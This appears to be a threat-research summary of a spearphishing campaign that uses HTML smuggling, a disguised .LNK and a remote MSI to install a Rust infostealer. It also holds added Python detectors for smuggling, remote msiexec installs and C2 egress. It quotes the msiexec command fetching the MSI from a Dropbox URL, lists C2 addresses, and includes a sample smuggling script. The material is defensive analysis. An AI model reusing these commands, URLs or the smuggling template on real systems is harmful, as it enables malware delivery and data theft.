Threat Actors Exploit the Tensions Between Azerbaijan and Armenia | FortiGuard Labs

FortiGuard Labs discovered a targeted spearphishing campaign exploiting Azerbaijan–Armenia tensions that uses HTML smuggling in an HTML memo to deliver a password-protected archive which contains a malicious .LNK that launches an MSI via msiexec. The MSI installs a Rust-based infostealer named “Windows Defender Health Check” that achieves persistence via a scheduled task, collects system info and environment variables, checks for proxies, and exfiltrates encrypted data to C2 servers in the 78.135.73.0/24 subnet. #WindowsDefenderHealthcheck #Azerbaijan

Keypoints

  • Spearphishing memo in HTML uses HTML smuggling to auto-deliver a password-protected ZIP containing a decoy image and a malicious .LNK shortcut.
  • The .LNK executes msiexec to download and run an MSI from a Dropbox URL, showing a phony image while installing malware in the background.
  • The installed payload (Windows Defender Health Check) is a Rust-based infostealer placed in %APPDATA%\Windows Defender Health Check\WindowsDefenderHealthcheck.exe.
  • Persistence is achieved by creating a temporary XML (24rp.xml) to register a scheduled task, then deleting the XML to reduce forensic artifacts; the malware also randomizes sleep intervals for stealth.
  • The infostealer gathers system information, environment variables, and checks for proxy settings before issuing an encrypted POST to a C2 at 78[.]135.73.140:35667.
  • Telemetry links the C2 to additional IPs in the same /24 (78[.]135.73.147, .162, .183, .188), and a Colombia-based IP was observed connecting to 78[.]135.73.188—potentially a VPN/mobile hotspot used by the actor.
  • Fortinet provides detections (e.g., W64/Agent.EO!tr.pws, LNK/Agent.360A!tr) and classifies the download URLs as malicious via FortiGuard services.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Use of an HTML memo to target management teams (‘infected memo pretending to come from the current president of a company in Azerbaijan’).
  • [T1027.006] Obfuscated Files or Information: HTML Smuggling – The memo is in HTML and uses HTML smuggling to automatically deliver a password-protected archive (‘The memo is in HTML format and uses HTML smuggling to automatically deliver a password-protected archive.’).
  • [T1218.007] System Binary Proxy Execution: Msiexec – Execution of msiexec to install a remote MSI downloaded from Dropbox (‘…\Windows\System32\msiexec.exe /i “https://dl[.]dropboxusercontent[.]com/…/karabakh.jpg.msi?…”’).
  • [T1053.005] Scheduled Task/Job – Creation of a temporary XML file used to register a scheduled task for persistence (‘a temporary file is created called “24rp.xml.” This file is used to create a scheduled task.’).
  • [T1082] System Information Discovery – Malware collects basic computer information and environment variables (‘gathering basic computer information’ and ‘collects a list of environment variables’).
  • [T1016] System Network Configuration Discovery – Malware checks the host's proxy settings so it can route its traffic through any proxy in use (‘takes an extra step to check for any proxy servers in use’).
  • [T1071.001] Application Layer Protocol: Web Protocols – Exfiltration of encrypted stolen data via HTTP POST to a C2 server (“POST request to send the encrypted information it stole to a C2 server owned by the threat actor, 78[.]135.73.140, through port 35667.”).

Indicators of Compromise

  • [File hash] Malware and lure samples – 5327308FEE51FC6BB95996C4185C4CFCBAC580B747D79363C7CF66505F3FF6DB (WindowsDefenderHealthcheck.exe), 35F2F7CD7945F43D9692B6EA39D82C4FC9B86709B18164AD295CE66AC20FD8E5 (karabakh.jpg.msi), and 3 more hashes.
  • [File name] Malicious and decoy filenames – WindowsDefenderHealthcheck.exe (installed infostealer), 1.KARABAKH.jpg.lnk (malicious shortcut disguised as an image; launches msiexec against the remote MSI).
  • [URL] Download location used by msiexec – https://dl[.]dropboxusercontent[.]com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi?rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0 (MSI download).
  • [IP addresses] C2 and related infrastructure – 78[.]135.73.140 (primary C2, port 35667) and additional hosts in the same /24 linked by telemetry: 78[.]135.73.147, .162, .183, .188.

The technical attack chain begins with an HTML-formatted spearphishing memo that leverages HTML smuggling to drop a password-protected ZIP. The archive contains image files used as decoys and one malicious .LNK disguised as an image; when a user opens the shortcut it runs msiexec to fetch a remote MSI hosted on a Dropbox URL. The MSI presents a phony image to the user while simultaneously installing a hidden payload.
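The smuggling step is worth being able to recognise statically, before anyone opens the memo. The Python below is an added example, not code from the FortiGuard write-up: it scans an HTML file for the JavaScript wrapper that HTML smuggling needs (base64 decode, Blob construction, object URL, forced download) and carves any embedded ZIP so the archive members can be inspected without running the page. The lure it runs against is constructed inline; the shortcut name 1.KARABAKH.jpg.lnk is the one listed under Indicators of Compromise, while the decoy image name, the script wrapper and the member contents are assumptions. Python's zipfile cannot write password-protected archives, so the sample ZIP is unencrypted; the carver still reports the encryption flag, which a real sample would set.

```python
import base64
import io
import re
import zipfile


def build_sample_zip() -> bytes:
    """Constructed archive standing in for the smuggled ZIP (assumed contents)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("2.KARABAKH.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 2048)  # decoy image stub (assumed name)
        zf.writestr("1.KARABAKH.jpg.lnk", b"L\x00\x00\x00" + b"\x00" * 72)    # LNK header stub, name from the IoC list
    return buf.getvalue()


# Constructed HTML memo: the script is the textbook HTML smuggling sequence
# (decode base64 -> Blob -> object URL -> forced download), not the real lure's code.
SAMPLE_HTML = """<html><body><h1>Memo</h1>
<script>
var b64 = "%s";
var bin = atob(b64);
var arr = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) arr[i] = bin.charCodeAt(i);
var blob = new Blob([arr], {type: "application/octet-stream"});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "KARABAKH.zip";
a.click();
</script></body></html>""" % base64.b64encode(build_sample_zip()).decode()

INDICATORS = {
    "base64_decode": re.compile(r"\batob\s*\("),
    "blob_construct": re.compile(r"\bnew\s+Blob\s*\("),
    "object_url": re.compile(r"URL\.createObjectURL\s*\("),
    "forced_download": re.compile(r"\.download\s*=|\bdownload\s*=\s*[\"']"),
    "auto_click": re.compile(r"\.click\s*\(\s*\)"),
    "ms_save_blob": re.compile(r"msSaveOrOpenBlob"),
}
# A quoted base64 run of at least 256 characters; real lures carry far more.
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{256,}={0,2})[\"']")
# Image/document extension followed by an executable one, e.g. .jpg.lnk
DOUBLE_EXT = re.compile(r"\.(jpe?g|png|gif|pdf|docx?)\.(lnk|exe|msi|js|vbs|hta|scr)$", re.I)


def smuggling_indicators(html: str) -> dict:
    """Which pieces of the smuggling wrapper are present in the page."""
    hits = {name: bool(rx.search(html)) for name, rx in INDICATORS.items()}
    hits["large_b64_literal"] = bool(B64_LITERAL.search(html))
    return hits


def carve_archives(html: str) -> list:
    """Decode each large base64 literal and describe any that is a ZIP."""
    found = []
    for m in B64_LITERAL.finditer(html):
        try:
            data = base64.b64decode(m.group(1), validate=True)
        except ValueError:
            continue
        if not data.startswith(b"PK\x03\x04"):
            continue
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            members = [{
                "name": info.filename,
                "encrypted": bool(info.flag_bits & 0x1),   # bit 0 = member is password-protected
                "double_ext": bool(DOUBLE_EXT.search(info.filename)),
            } for info in zf.infolist()]
        found.append({"size": len(data), "members": members})
    return found


def is_smuggling(html: str) -> bool:
    """Verdict: three or more wrapper indicators plus a carved archive."""
    hits = smuggling_indicators(html)
    script_hits = sum(v for k, v in hits.items() if k != "large_b64_literal")
    return script_hits >= 3 and bool(carve_archives(html))


if __name__ == "__main__":
    print(smuggling_indicators(SAMPLE_HTML))
    for archive in carve_archives(SAMPLE_HTML):
        print(archive)
    print("verdict:", is_smuggling(SAMPLE_HTML))
```

The indicator set deliberately requires several pieces of the wrapper rather than any one of them, since `atob` or a Blob alone is common in legitimate pages; the carved member list is what turns a suspicion into a finding, because a double extension such as .jpg.lnk inside a smuggled archive has no benign explanation.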

The installed payload is a Rust-written infostealer placed at %APPDATA%\Windows Defender Health Check\WindowsDefenderHealthcheck.exe. For persistence it creates a temporary file named 24rp.xml to register a scheduled task and then deletes the XML to reduce traces. The malware also includes anti-detection timing (random sleep intervals) to execute after hours.

Functionally the infostealer collects basic system information, enumerates environment variables, checks for proxy settings (and adapts its routing), then encrypts and sends the stolen data via an HTTP POST to C2 78[.]135.73.140 on port 35667. Fortinet telemetry links the C2 to additional IPs in the same /24 (78[.]135.73.147, .162, .183, .188), and a Colombia IP was observed connecting to 78[.]135.73.188—potentially indicating actor use of a VPN or mobile hotspot. Fortinet provides AV signatures and web-filtering classifications for the samples and download URLs.
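The execution, persistence and exfiltration steps above each leave a pattern that can be hunted in endpoint and network telemetry. As an added example (not Fortinet's own detection content), the Python below runs three checks over constructed events: msiexec launched with an http(s) install source, a scheduled task registered while an XML file appears and then disappears within a short window, and egress to the 78.135.73.0/24 subnet, with the page's port 35667 raising the severity. The event shape, the timestamps, the path where 24rp.xml is written, the task name and the benign noise are assumptions; the page names neither the XML's directory nor the task.

```python
import ipaddress
import re
from datetime import datetime, timedelta

C2_SUBNET = ipaddress.ip_network("78.135.73.0/24")   # subnet from the page
C2_PORT = 35667                                       # C2 port from the page
# msiexec ... /i "<http(s) URL>": install source fetched from the network
REMOTE_MSI = re.compile(r'(?i)\bmsiexec(?:\.exe)?\b.*\s/i\s+"?https?://')

# Constructed telemetry modelled loosely on Sysmon event types. Paths, times and
# the task name are assumptions; file, process, subnet and port come from the page.
XML_PATH = r"C:\Users\user\AppData\Roaming\Windows Defender Health Check\24rp.xml"  # assumed location
EVENTS = [
    {"ts": "2024-05-01T09:00:00", "type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": 'msiexec.exe /i "https://dl.dropboxusercontent.com/.../karabakh.jpg.msi"'},
    {"ts": "2024-05-01T09:00:40", "type": "file_create", "path": XML_PATH},
    {"ts": "2024-05-01T09:00:41", "type": "task_registered", "name": "ExampleTask"},  # name not given on the page
    {"ts": "2024-05-01T09:00:42", "type": "file_delete", "path": XML_PATH},
    {"ts": "2024-05-01T10:00:00", "type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\user\Downloads\7z2401-x64.msi"'},           # benign local install
    {"ts": "2024-05-01T10:00:05", "type": "network", "image": "svchost.exe",
     "dst_ip": "8.8.8.8", "dst_port": 53},                                             # benign DNS
    {"ts": "2024-05-01T11:30:00", "type": "network", "image": "WindowsDefenderHealthcheck.exe",
     "dst_ip": "78.135.73.140", "dst_port": 35667},
    {"ts": "2024-05-01T11:31:00", "type": "network", "image": "WindowsDefenderHealthcheck.exe",
     "dst_ip": "78.135.73.188", "dst_port": 443},
]


def parse_ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


def detect_remote_msiexec(events: list) -> list:
    """msiexec installing straight from a URL, the LNK-to-MSI step."""
    return [f"msiexec remote install: {e['cmdline']}"
            for e in events if e["type"] == "process" and REMOTE_MSI.search(e["cmdline"])]


def detect_transient_task_xml(events: list, window: timedelta = timedelta(minutes=5)) -> list:
    """An XML is created, a task is registered, and the same XML is deleted, all inside `window`."""
    alerts = []
    for c in events:
        if c["type"] != "file_create" or not c["path"].lower().endswith(".xml"):
            continue
        t0 = parse_ts(c["ts"])
        later = [e for e in events if t0 <= parse_ts(e["ts"]) <= t0 + window]
        registered = any(e["type"] == "task_registered" for e in later)
        deleted = any(e["type"] == "file_delete" and e["path"].lower() == c["path"].lower()
                      for e in later)
        if registered and deleted:
            alerts.append(f"scheduled task registered from transient XML {c['path']}")
    return alerts


def detect_c2_egress(events: list) -> list:
    """Any connection into the C2 /24; the known port makes it high severity."""
    alerts = []
    for e in events:
        if e["type"] == "network" and ipaddress.ip_address(e["dst_ip"]) in C2_SUBNET:
            sev = "high" if e["dst_port"] == C2_PORT else "medium"
            alerts.append(f"{sev}: {e['image']} -> {e['dst_ip']}:{e['dst_port']}")
    return alerts


def hunt(events: list) -> list:
    return detect_remote_msiexec(events) + detect_transient_task_xml(events) + detect_c2_egress(events)


if __name__ == "__main__":
    for line in hunt(EVENTS):
        print(line)
```

The transient-XML check is the one that survives the malware's clean-up: deleting 24rp.xml removes the artifact from disk, but the create/register/delete sequence remains in file and task-scheduler telemetry, and correlating the three within a window is what distinguishes it from an administrator importing a task definition and leaving the file in place.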

Read more: https://www.fortinet.com/blog/threat-research/threat-Actors-exploit-the-tensions-between-azerbaijan-and-armenia